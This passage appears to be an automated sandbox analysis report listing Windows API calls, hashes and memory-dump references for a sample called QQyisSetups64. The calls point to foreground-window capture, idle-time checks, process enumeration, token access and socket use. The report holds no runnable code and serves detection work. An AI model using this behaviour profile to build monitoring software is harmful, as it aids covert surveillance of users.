                                                                                                                                                                                                                      • Instruction ID: 1eaab899cde1b64101b3b36230ec0d6c44dd13784f44ee8124b04f6077c57294
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ff916adb2edd080c6ff0ad6dd16e81a10b5d8a9d98b64f7e23c674d7a423133
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D611DB5E40219AFDB04DFA8DC84EAEB7B8FF49310F14466AE915EB345D7349901CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378BB21
                                                                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0378BB37
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0378BB3D
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378BB66
                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0378BB6F
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0378BB83
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                                                                                                                      • String ID: %d min
                                                                                                                                                                                                                      • API String ID: 3754759880-1947832151
                                                                                                                                                                                                                      • Opcode ID: d250d37e4f62c8a01ad23a3c39bdedf3c56cec65976d9395c341ebf4f77586b8
                                                                                                                                                                                                                      • Instruction ID: bda4eeecd486293b0371f77ceabc9485dd7324fad19965c6990a4520da81ee89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d250d37e4f62c8a01ad23a3c39bdedf3c56cec65976d9395c341ebf4f77586b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1941A6B5940218AFDB10EFA4DC88E9FBBB8EF88710F088555F9099B355D7749A04CBE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(453DC9E3,00000000,00000000,75A373E0,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786938
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786947
                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 03786960
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,037A10DB,000000FF,?,03786AB3,00000000), ref: 0378696B
                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037869BE
                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(00000000), ref: 037869CC
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,037A10DB,000000FF), ref: 03786A2E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,037A10DB,000000FF), ref: 03786A34
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 429299433-0
                                                                                                                                                                                                                      • Opcode ID: fd3ee3900cd2190015158c90cacd5c730617a97c5f7f99ad7a4f3b634e1c553c
                                                                                                                                                                                                                      • Instruction ID: a2d55288b154a7e3044868a7fe420ef5ec0adc2c5aea218476f08fd242103684
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd3ee3900cd2190015158c90cacd5c730617a97c5f7f99ad7a4f3b634e1c553c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C41DCB2D80618AFDB10EFA8CC44AAEF7F8FB44710F15462AEA15E7241D7755901C7A0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03786DD9
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,037A5164,00000000,00020019,75A373E0), ref: 03786DFC
                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(75A373E0,GROUP,00000000,00000001,?,00000208), ref: 03786E4A
                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,037A5148), ref: 03786E60
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(037856EA,?), ref: 03786E72
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                                      • String ID: GROUP
                                                                                                                                                                                                                      • API String ID: 2102619503-2593425013
                                                                                                                                                                                                                      • Opcode ID: 23c7617a6251003a185c9c437860abe9e78686d0e4a1302327dc5f56e1910792
                                                                                                                                                                                                                      • Instruction ID: 7abc5498526a6d25e37066fc9cfa6323402eaa7f8d821a5d6a5c363e9e6c794b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23c7617a6251003a185c9c437860abe9e78686d0e4a1302327dc5f56e1910792
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39316371940319BBDB20EF94ED89B9EB7B8FF48710F104699E519A6280DB74AA84CF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0378FA4E
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 0378FA5A
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0378FA67
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0378F9C4,00000000,00000000,0378E003), ref: 0378FA9E
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,0378E003,00000000,00000000,03785F40,00000000,00000000,00000000), ref: 0378FAA8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378FAB1
                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0378FABC
                                                                                                                                                                                                                        • Part of subcall function 0378F91B: __getptd_noexit.LIBCMT ref: 0378F91B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                                                                      • Opcode ID: b1c2933ca314bda0910a8fa8481ab82bc200bbe203a1f6efa8c14f07aa137a09
                                                                                                                                                                                                                      • Instruction ID: 1e8ac946819108fac79966d9c34278b5df337d9a6d62fd196502b01d29b97dc1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1c2933ca314bda0910a8fa8481ab82bc200bbe203a1f6efa8c14f07aa137a09
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE11083A24070ABFEB10FFA5FC84D9B37D8DF46A707144526F914CA180DB71D8028B61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C87240
                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 02C8724C
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C87259
                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,02C871B6,00000000,?,?), ref: 02C87290
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02C8729A
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C872A3
                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 02C872AE
                                                                                                                                                                                                                        • Part of subcall function 02C8710D: __getptd_noexit.LIBCMT ref: 02C8710D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 155776804-0
                                                                                                                                                                                                                      • Opcode ID: 6e30613b1aeb001396528c79616f7fd11f3a422246e395731b60d4d3210bcb83
                                                                                                                                                                                                                      • Instruction ID: 7455e438b98cbd62e227d06ab6755b135b06b89a3b3b23b3a3e989c6d88234f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e30613b1aeb001396528c79616f7fd11f3a422246e395731b60d4d3210bcb83
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3110836100706EFDB11BFA5DC44EABB7E9EF4137CB208429F91886150EB31C5149AA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03787523), ref: 0378743D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 03787444
                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 03787452
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03787523), ref: 0378745A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystem$AddressHandleModuleNativeProc
                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3433367815-192647395
                                                                                                                                                                                                                      • Opcode ID: 6556520ffcfe1c3b5f64b303d2d2c3e41c2cc5bd1bcc15f78cdf8fdbc82a32a4
                                                                                                                                                                                                                      • Instruction ID: d159264e15ed90618a08709e84ab45ccc919d48da86fd0e7bb667ad4be5993f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6556520ffcfe1c3b5f64b303d2d2c3e41c2cc5bd1bcc15f78cdf8fdbc82a32a4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42014FB0D0420D9FCF54EFB8D9446AEBBF5EB48200F5445A9D95EE3241EA3A8A00CF61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0378F9CA
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: TlsGetValue.KERNEL32(00000000,03793DF9,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000), ref: 03793CA9
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: DecodePointer.KERNEL32(?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06,0000000D), ref: 03793CBB
                                                                                                                                                                                                                        • Part of subcall function 03793CA0: TlsSetValue.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793CCA
                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0378F9D5
                                                                                                                                                                                                                        • Part of subcall function 03793C80: TlsGetValue.KERNEL32(?,?,0378F9DA,00000000), ref: 03793C8E
                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0378F9E8
                                                                                                                                                                                                                        • Part of subcall function 03793CD4: DecodePointer.KERNEL32(?,?,?,0378F9ED,00000000,?,00000000), ref: 03793CE5
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0378F9F1
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0378F9F8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378F9FE
                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0378FA1E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                                                                      • Opcode ID: b71b6f1e2f9624e562b831b7a23a8fe5f51c53bacac09f34f92ec508bd51c052
                                                                                                                                                                                                                      • Instruction ID: 356b352b6a76ea656dc461b5cae1e46d884359ad90229d21b0d470495d86210f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b71b6f1e2f9624e562b831b7a23a8fe5f51c53bacac09f34f92ec508bd51c052
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2F0967C640B00BFEB08FF70E94C84E7BECAF8A2503218659E909CF241DA34D442CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C871BC
                                                                                                                                                                                                                        • Part of subcall function 02C89754: TlsGetValue.KERNEL32(00000000,02C898AD,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000), ref: 02C8975D
                                                                                                                                                                                                                        • Part of subcall function 02C89754: DecodePointer.KERNEL32(?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA,0000000D), ref: 02C8976F
                                                                                                                                                                                                                        • Part of subcall function 02C89754: TlsSetValue.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C8977E
                                                                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C871C7
                                                                                                                                                                                                                        • Part of subcall function 02C89734: TlsGetValue.KERNEL32(?,?,02C871CC,00000000), ref: 02C89742
                                                                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C871DA
                                                                                                                                                                                                                        • Part of subcall function 02C89788: DecodePointer.KERNEL32(?,?,?,02C871DF,00000000,?,00000000), ref: 02C89799
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C871E3
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C871EA
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C871F0
                                                                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C87210
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2383549826-0
                                                                                                                                                                                                                      • Opcode ID: 9b8af520ad19124ba38e53c11f001401c9a6aabc38dff8bbac251030a430b54a
                                                                                                                                                                                                                      • Instruction ID: ed780a37559c5b08afba14007551665b7a093517ebed2b4f605abcfb47ee85af
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b8af520ad19124ba38e53c11f001401c9a6aabc38dff8bbac251030a430b54a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF03078400644ABC704BFB1CD4C96EBBAAAF8935C724CD58E90987315EB38D446EFA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378607C
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03786088
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000000), ref: 037860B9
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0378610F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03786116
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2526126748-0
                                                                                                                                                                                                                      • Opcode ID: 28e1c5a7a5c9f1ef4f35e941f3a7581f0789edea53530db2d351b7ef88f4db3b
                                                                                                                                                                                                                      • Instruction ID: 2b43b2c9eb2b66e70f91d2b62c66f8278dc898ba21a9585ae0f66305995ed997
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28e1c5a7a5c9f1ef4f35e941f3a7581f0789edea53530db2d351b7ef88f4db3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6521E731A40118ABDB20FF64EC59BEAB369EF54310F144699DE09971C1EB359A01C650
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C832F1
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 02C832FE
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C83306
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C83312
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C8331A
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 02C8332B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                                                                      • Opcode ID: 2a24671d5a0eedda63eac927461c5e0528f8832189fe705133b786f7c2308fbd
                                                                                                                                                                                                                      • Instruction ID: 0d0bcc9e2e2da8971b41510eb78df876bbacc41737d255ed13262e24e2799031
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a24671d5a0eedda63eac927461c5e0528f8832189fe705133b786f7c2308fbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0F082722443046BD610ABA9DC88F46F3A8AF85370B204B09F221876D0CAB0E8018BA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 0378669B
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(037A46FC,00000000,00000001,037A471C,?,?,?,?,?,?,?,?,?,?,0378588A), ref: 037866B2
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0378674C
                                                                                                                                                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0378588A), ref: 0378677D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                                                                                                                                                      • String ID: FriendlyName
                                                                                                                                                                                                                      • API String ID: 841178590-3623505368
                                                                                                                                                                                                                      • Opcode ID: b9387d0a14064fa39034558b0c6eedb9b871b8dfe77b78b83a824ba8faac73ba
                                                                                                                                                                                                                      • Instruction ID: 1cf2e890297a770e6019c859152f4c0fc29ba6fceca90fbbd8e680c6694e0fa9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9387d0a14064fa39034558b0c6eedb9b871b8dfe77b78b83a824ba8faac73ba
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8314A75740609AFDB00EB99DC80EAEB7B9EFC9704F148598E604EB255DA71ED01CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
                                                                                                                                                                                                                        • Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0378F756
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0378F770
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0378F781
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                      • String ID: bad allocation
                                                                                                                                                                                                                      • API String ID: 615853336-2104205924
                                                                                                                                                                                                                      • Opcode ID: 9663dc724662003ae0a10da5014a338cd140ab5cd59f81fe9572a0d8f89a7906
                                                                                                                                                                                                                      • Instruction ID: ac27d5149ec15d381865cd034fcd75a8f45ec8381cb7317aab1130e6e2da36c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9663dc724662003ae0a10da5014a338cd140ab5cd59f81fe9572a0d8f89a7906
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94F02D75540B096FEB00FB28FC28A5E77B9AF80244F58415DD410DA091DB708540CF44
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03782D5C
                                                                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 03782D66
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03782D6F
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03782D79
                                                                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 03782D83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                                                                      • Opcode ID: 6f01b3fd5e5b3ce29ee78bcf5953622a9f5e8eb977f9e25e845ae96d3a72e30a
                                                                                                                                                                                                                      • Instruction ID: 8b1903504dcbf2695bd5b4e8e766de10d57e56a769b6372f330afb9b93d68af9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f01b3fd5e5b3ce29ee78bcf5953622a9f5e8eb977f9e25e845ae96d3a72e30a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAF03C76100B04BFD224AF54DD49B6677F8BB89B11F104A1DFA9296685C6B4B9048BA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02C82D3C
                                                                                                                                                                                                                      • CancelIo.KERNEL32(?), ref: 02C82D46
